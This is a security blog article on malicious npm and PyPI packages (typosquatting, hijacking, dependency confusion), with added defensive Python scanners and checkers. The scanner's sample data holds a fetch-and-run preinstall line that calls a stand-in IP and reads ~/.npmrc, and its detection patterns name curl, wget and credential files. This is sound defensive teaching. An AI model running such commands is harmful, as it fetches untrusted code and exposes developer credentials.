Information Security Buzz
Articles: Application Security, Attacks, Malware, Security, Software Development Security, Threats and Vulnerabilities

Protecting DevOps Workflow From The Threat Of Malicious Packages

By Olivia William. May 8, 2023. Updated August 22, 2024. 5 min read

DevOps is a compound of "development" (Dev) and "operations" (Ops). It names a set of practices and a culture that joins software planning and development with IT operations. DevOps shortens development cycles and improves how software is run and delivered, which is what customers ultimately experience as a good service.

These objectives are achieved through three factors:

♦ Shared ownership

♦ Automation of the workflow

♦ A timely feedback loop

Microsoft describes DevOps as bringing together functions that were previously isolated from one another: development, IT operations, quality engineering, and security.

Because the benefits are so large, demand for DevOps keeps growing. That growth has also attracted attackers, who slip code and software that masquerades as legitimate into the development process in order to damage it. These are the malicious packages discussed here.

The Saga Of Malicious Packages In DevOps

Malicious packages have multiplied as the tooling around software development has evolved. They enter the development process through open-source dependencies or third-party services, and from there threaten the whole DevOps pipeline.

Research shows that more than 60% of cyber incidents result from compromises of, or vulnerabilities in, third-party providers. Attackers know that a vendor's service is often an easier way into an organization's development systems than a direct assault. They also publish malicious code to open-source registries; it then arrives through the software supply chain the moment the development team installs the package.

It is hard to say when the first malicious package reached a DevOps pipeline, but the first technology built to detect them was developed by Sonatype in 2019. Its tooling reportedly caught malicious open-source packages that antivirus products missed, and in 2020 it was also the first to flag proof-of-concept research packages. The count stood at about 1,200 detected packages by the end of 2020 and 12,000 in 2021. For 2022, Sonatype reported a 633% increase, which works out to roughly 88,000 packages (the figure a 633% rise over 12,000 implies). That growth rate is what makes malicious packages such a serious threat to DevOps.

Security teams became alarmed as the number of malicious packages climbed. Because Python's package index (PyPI) and JavaScript's Node Package Manager (npm) are so widely used, they are the registries where malicious packages most often appear. According to a report from Snyk, 6,800 malicious packages were recorded on PyPI and npm in Q1 2023 alone.

Although most reported malicious packages are found on PyPI and npm, other registries see them too: RubyGems, Maven Central (the Java ecosystem), and NuGet, Microsoft's package manager for .NET and .NET Core.

In its analysis, Snyk's security intelligence team identified packages that abuse install-time lifecycle scripts such as "preinstall" and "postinstall". npm runs these automatically during installation, so a package can steal sensitive data or drop malware before any of its code is ever imported by the application. One JavaScript package reported in 2023, Django-youth, carried a "preinstall" script that began executing the moment a user installed the package. Other malicious packages simply redirect the user to an attacker-controlled website.
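An added example, not code from the article or from Snyk: a small Python scanner that walks a dependency tree, picks out every package declaring an install-time lifecycle hook, and scores how suspicious each hook's command looks. The package names, the package.json contents and the indicator patterns are constructed for the demo; treat the score as a triage signal, not a verdict, because native modules legitimately use install hooks too.

```python
# Added example (not from the article): flag npm packages that declare
# install-time lifecycle scripts and rate how suspicious each script is.
# All manifests below are constructed for the demo; no real package named
# "some-innocent-lib", "native-thing" or "evil-helper" is implied.
import json
import re

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Patterns that frequently appear in install-time droppers: remote fetch,
# inline code execution, obfuscation, and access to developer secrets.
SUSPICIOUS = {
    "remote_fetch": re.compile(r"\b(curl|wget|Invoke-WebRequest|fetch\()", re.I),
    "inline_exec": re.compile(r"\bnode\s+-e\b|\beval\(|\bexec\(|\bchild_process\b"),
    "encoded_payload": re.compile(r"base64|\\x[0-9a-f]{2}|fromCharCode", re.I),
    "secret_access": re.compile(r"\.npmrc|\.ssh|\.aws|id_rsa|AWS_SECRET|\btoken\b", re.I),
}


def scan_package_json(text: str) -> dict:
    """Return the lifecycle hooks one package.json declares plus a risk score."""
    manifest = json.loads(text)
    scripts = manifest.get("scripts", {}) or {}
    hooks = {h: scripts[h] for h in LIFECYCLE_HOOKS if h in scripts}
    indicators = set()
    for cmd in hooks.values():
        for label, pattern in SUSPICIOUS.items():
            if pattern.search(cmd):
                indicators.add(label)
    return {
        "name": manifest.get("name", "<unknown>"),
        "version": manifest.get("version", "?"),
        "hooks": hooks,
        "indicators": sorted(indicators),
        # one point per hook, two per indicator: a plain "node-gyp rebuild"
        # scores 1, a curl-pipe-sh preinstall scores much higher
        "score": len(hooks) + 2 * len(indicators),
    }


def scan_tree(manifests: dict) -> list:
    """Scan a {path: package.json text} mapping (e.g. a walked node_modules) and
    return only the packages that declare a lifecycle hook, worst first."""
    findings = [scan_package_json(text) for text in manifests.values()]
    return sorted((f for f in findings if f["hooks"]), key=lambda f: -f["score"])


# Constructed sample tree (not real packages).
SAMPLE_TREE = {
    "node_modules/some-innocent-lib/package.json": json.dumps({
        "name": "some-innocent-lib", "version": "2.1.0",
        "scripts": {"test": "jest", "build": "tsc"},
    }),
    "node_modules/native-thing/package.json": json.dumps({
        "name": "native-thing", "version": "0.4.2",
        "scripts": {"install": "node-gyp rebuild"},
    }),
    "node_modules/evil-helper/package.json": json.dumps({
        "name": "evil-helper", "version": "1.0.3",
        "scripts": {"preinstall": "curl -s http://203.0.113.5/x.sh | sh; "
                                  "node -e \"require('child_process').exec('cat ~/.npmrc')\""},
    }),
}

if __name__ == "__main__":
    for f in scan_tree(SAMPLE_TREE):
        print(f"{f['name']}@{f['version']} score={f['score']} "
              f"hooks={list(f['hooks'])} indicators={f['indicators']}")
```

In a real pipeline the `manifests` mapping would come from walking `node_modules` after `npm ci --ignore-scripts`, which installs the files without running any hook; the findings then decide which packages, if any, may have their scripts run in a second, reviewed step. pip has no equivalent switch for sdist build scripts, so the analogous control there is `--only-binary :all:` to refuse source distributions.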

How Malicious Packages Compromise DevOps

Research shows that most malicious packages are deployed to reach an organization's databases. In practice they are observed delivering remote access trojans, stealing cryptocurrency, mining cryptocurrency on the victim's hardware (a recurring theme in crypto-mining fraud), and exfiltrating sensitive information.

To carry out these attacks, however, the attacker first needs a way to get the package installed. The common methods include the following:

Typosquatting 

The attacker publishes a package whose name differs from a popular one by a single typo or a pair of transposed letters. If the developer does not check the spelling carefully, the wrong package is installed. The method is common on open-source registries, and the same trick is used with look-alike web page addresses.
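An added example, not code from the article: a Python check that compares requested package names against an allowlist of known-good names and flags close look-alikes before they are installed. It goes slightly beyond the single-typo case in the text, also catching transposed letters, digit-for-letter confusables, and "python-" style prefix padding. The allowlist and the requested names are constructed for the demo.

```python
# Added example (not from the article): flag requested package names that are
# suspiciously close to a known-good name. The allowlist is a constructed
# handful; in practice it would be the organization's approved packages or
# the registry's most-downloaded names.
import re


def normalize(name: str) -> str:
    """PEP 503 normalization: case-insensitive, and '-', '_' and '.' are equivalent."""
    return re.sub(r"[-_.]+", "-", name).lower()


def edit_distance(a: str, b: str) -> int:
    """Optimal-string-alignment distance: insert, delete, substitute, or
    swap two adjacent characters each cost 1 (so 'reqeusts' is 1 from 'requests')."""
    prev2, prev = None, list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cost = 0 if ca == cb else 1
            best = min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + cost)
            if prev2 is not None and i > 1 and j > 1 and ca == b[j - 2] and a[i - 2] == cb:
                best = min(best, prev2[j - 2] + 1)
            cur.append(best)
        prev2, prev = prev, cur
    return prev[-1]


# Look-alike substitutions that a plain edit distance under-weights.
CONFUSABLES = [("0", "o"), ("1", "l"), ("rn", "m"), ("vv", "w"), ("our", "or")]


def looks_like(candidate: str, known: str) -> bool:
    """True if candidate is a plausible typosquat of known (and not known itself)."""
    c, k = normalize(candidate), normalize(known)
    if c == k:
        return False
    # allow one edit for short names, two for long ones
    if edit_distance(c, k) <= 1 + (1 if len(k) > 8 else 0):
        return True
    for x, y in CONFUSABLES:
        if c.replace(x, y) == k or c.replace(y, x) == k:
            return True
    # prefix/suffix padding: "python-numpy", "requests3", "requests-py"
    core = re.sub(r"^(python|py|node)-|-(py|js|python)$|\d+$", "", c)
    return core == k and core != c


def check_names(requested, allowlist) -> dict:
    """Return {requested_name: known_name} for every request that is not an
    exact allowlisted name but closely resembles one."""
    allowed = {normalize(k) for k in allowlist}
    hits = {}
    for req in requested:
        if normalize(req) in allowed:
            continue
        for known in allowlist:
            if looks_like(req, known):
                hits[req] = known
                break
    return hits


ALLOWLIST = ["requests", "colorama", "urllib3", "numpy", "cryptography"]  # constructed
REQUESTED = ["requests", "reqeusts", "colourama", "ur11ib3",
             "python-numpy", "crypt0graphy", "flask"]  # constructed

if __name__ == "__main__":
    for bad, good in check_names(REQUESTED, ALLOWLIST).items():
        print(f"{bad!r} looks like {good!r}")
```

A name that is neither allowlisted nor a look-alike (`flask` above) is not flagged by this check; it should go through the normal review process rather than being treated as safe.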

Trojan Package

A trojan package works much like masquerading: it is built to resemble a legitimate package but carries small differences that are easy to miss. Once installed, it can damage the system or steal critical data. One example is lemaaa, a package that was used to hijack Discord accounts.

Hijacking

Hijacking is very effective and has a very high infection rate, but it is also the hardest method to pull off. The attacker compromises a maintainer's account and uses it to push malicious code into a package that is already widely trusted. In a widely reported case from October 2021, maintainers' accounts were compromised and malicious code was added to several versions of a package said to have about 1.5 billion downloads to date.

Dependency Confusion

Package managers generally prefer the highest version number they can find for a given name, regardless of which index it came from. Dependency confusion exploits that rule: the attacker learns the name of a private, internal package and publishes a package of the same name to the public registry with a much higher version number. A build that consults both the private and the public index then picks the attacker's copy as the "newest" and therefore best choice.
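An added example, not code from the article: a Python simulation of the two resolution rules, the "highest version wins across all indexes" behaviour that dependency confusion exploits, and a namespace-pinned rule that refuses to fetch a reserved internal name from the public registry. The package names, versions, the internal index URL and the "acme-" namespace are constructed for the demo; pypi.org is named only as the public side of the lookup.

```python
# Added example (not from the article): why pooling candidates from several
# package indexes is exploitable, and the rule that closes the hole.
# Names, versions and the internal index are constructed for the demo.


def parse_version(v: str) -> tuple:
    """Minimal numeric version parser: "1.4.2" -> (1, 4, 2). No pre-release handling."""
    return tuple(int(part) for part in v.split("."))


# Each index is {package_name: [versions it serves]}.
PRIVATE_INDEX = {"acme-billing-core": ["1.3.0", "1.4.2"]}
PUBLIC_INDEX = {
    "requests": ["2.31.0"],
    # The attacker has published the internal name to the public registry
    # with an absurdly high version so any merged lookup prefers it.
    "acme-billing-core": ["99.0.0"],
}

INDEXES = {
    "https://pypi.example.internal/simple": PRIVATE_INDEX,  # constructed
    "https://pypi.org/simple": PUBLIC_INDEX,
}
# Name prefixes reserved for the internal index (constructed).
NAMESPACES = {"acme-": "https://pypi.example.internal/simple"}


def resolve_naive(name: str, indexes: dict) -> tuple:
    """Merged-index lookup (what `pip --extra-index-url` does): every index's
    candidates are pooled and the highest version wins, wherever it came from."""
    candidates = [
        (parse_version(v), v, url)
        for url, index in indexes.items()
        for v in index.get(name, [])
    ]
    if not candidates:
        raise LookupError(name)
    _, version, url = max(candidates)
    return version, url


def resolve_pinned(name: str, indexes: dict, index_for_prefix: dict) -> tuple:
    """Hardened rule: a name under a reserved prefix may only come from the index
    that owns the prefix; all other names come only from non-reserved indexes."""
    for prefix, url in index_for_prefix.items():
        if name.startswith(prefix):
            allowed = {url}
            break
    else:
        allowed = {u for u in indexes if u not in index_for_prefix.values()}
    candidates = [
        (parse_version(v), v, url)
        for url, index in indexes.items() if url in allowed
        for v in index.get(name, [])
    ]
    if not candidates:
        raise LookupError(f"{name} is not available from allowed index(es) {sorted(allowed)}")
    _, version, url = max(candidates)
    return version, url


if __name__ == "__main__":
    print("naive  :", resolve_naive("acme-billing-core", INDEXES))    # attacker's 99.0.0
    print("pinned :", resolve_pinned("acme-billing-core", INDEXES, NAMESPACES))
    print("public :", resolve_pinned("requests", INDEXES, NAMESPACES))
```

pip itself has no per-package index pinning, so in practice the pinned rule is enforced by a private proxy or virtual repository that serves reserved names only from the internal source; on npm the equivalent is publishing internal packages under a scope (`@acme/...`) and binding that scope to the private registry in `.npmrc`. Registering the internal names on the public registry as placeholders also blocks the attack.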

Masquerading

Masquerading is deception: the attacker takes a legitimate package, copies its code and data, adds malicious code, and republishes the result under the exact name of the original package so that it is indistinguishable by name from the real thing.

Dealing With Malicious Packages In DevOps

  • Continuously monitor the software supply chain so that threats to the DevOps pipeline are detected early.
  • Demand a thorough software bill of materials (SBOM) from vendors and review it; the SBOM records every component that makes up a software package.
  • Inspect a package and its dependencies at source, for example through its GitHub repository, before adopting it.
  • Apply security testing at every stage of the systems development life cycle so that malicious packages are spotted quickly.
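An added example, not code from the article: one concrete enforcement step behind the last two recommendations is to pin every dependency to an exact version and artifact hash, and to refuse anything that does not match. The Python below parses pip's `pkg==ver --hash=sha256:...` syntax and verifies a downloaded artifact against it, rejecting a tampered copy and a silently bumped version. The requirements text and the artifact bytes are constructed for the demo.

```python
# Added example (not from the article): verify artifacts against a
# hash-pinned requirements file before they are allowed into the build.
# The requirements text and the artifact bytes are constructed for the demo.
import hashlib
import re

REQ_LINE = re.compile(r"^(?P<name>[A-Za-z0-9][A-Za-z0-9._-]*)==(?P<version>\S+)")
HASH_OPT = re.compile(r"--hash=sha256:(?P<digest>[0-9a-f]{64})")


def parse_pinned_requirements(text: str) -> dict:
    """Parse 'pkg==ver --hash=sha256:...' lines (backslash continuations joined).
    Returns {name: {"version": ..., "hashes": {...}}}. A line that is not an
    exact pin, or that carries no hash, is rejected outright."""
    joined = re.sub(r"\\\n\s*", " ", text)
    pins = {}
    for line in joined.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        m = REQ_LINE.match(line)
        if not m:
            raise ValueError(f"not an exact pin: {line!r}")
        hashes = {h.group("digest") for h in HASH_OPT.finditer(line)}
        if not hashes:
            raise ValueError(f"no --hash for {m.group('name')}: content is unpinned")
        pins[m.group("name").lower()] = {"version": m.group("version"), "hashes": hashes}
    return pins


def verify_artifact(name: str, version: str, data: bytes, pins: dict) -> bool:
    """True only if (name, version) is pinned and the artifact's SHA-256 matches a pin."""
    pin = pins.get(name.lower())
    if pin is None or pin["version"] != version:
        return False
    return hashlib.sha256(data).hexdigest() in pin["hashes"]


# Constructed stand-ins for a downloaded wheel and a tampered copy of it.
GOOD_WHEEL = b"PK\x03\x04 ... bytes of the wheel that was actually reviewed ..."
TAMPERED_WHEEL = GOOD_WHEEL + b"\n# extra payload appended after review"

# Constructed requirements file in the format `pip-compile --generate-hashes` emits.
REQUIREMENTS = f"""
# constructed for the demo; "example-lib" is not a real package
example-lib==1.4.2 \\
    --hash=sha256:{hashlib.sha256(GOOD_WHEEL).hexdigest()}
"""

if __name__ == "__main__":
    pins = parse_pinned_requirements(REQUIREMENTS)
    print("good   :", verify_artifact("example-lib", "1.4.2", GOOD_WHEEL, pins))
    print("tamper :", verify_artifact("example-lib", "1.4.2", TAMPERED_WHEEL, pins))
    print("bumped :", verify_artifact("example-lib", "1.4.3", GOOD_WHEEL, pins))
```

pip enforces the same rule natively with `pip install --require-hashes -r requirements.txt`; the value of writing the check out is that it can run in CI against the artifacts a vendor ships, and fail the build when the SBOM and the pinned hashes disagree.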

Conclusion

According to Snyk, malicious packages in DevOps rose by a staggering 11,973% in 2022 and 2023 compared with previous years. A record like this is a warning to security vendors to improve their detection technology: even with careful examination, malicious packages still slip under the radar. DevOps platforms and security providers such as Snyk and Sonatype are working to reduce the rate of malicious threats in systems development, and organizations should adopt the recommended practices above to protect their systems development life cycle from malicious packages.


The opinions expressed in this post belong to the individual contributors and do not necessarily reflect the views of Information Security Buzz.
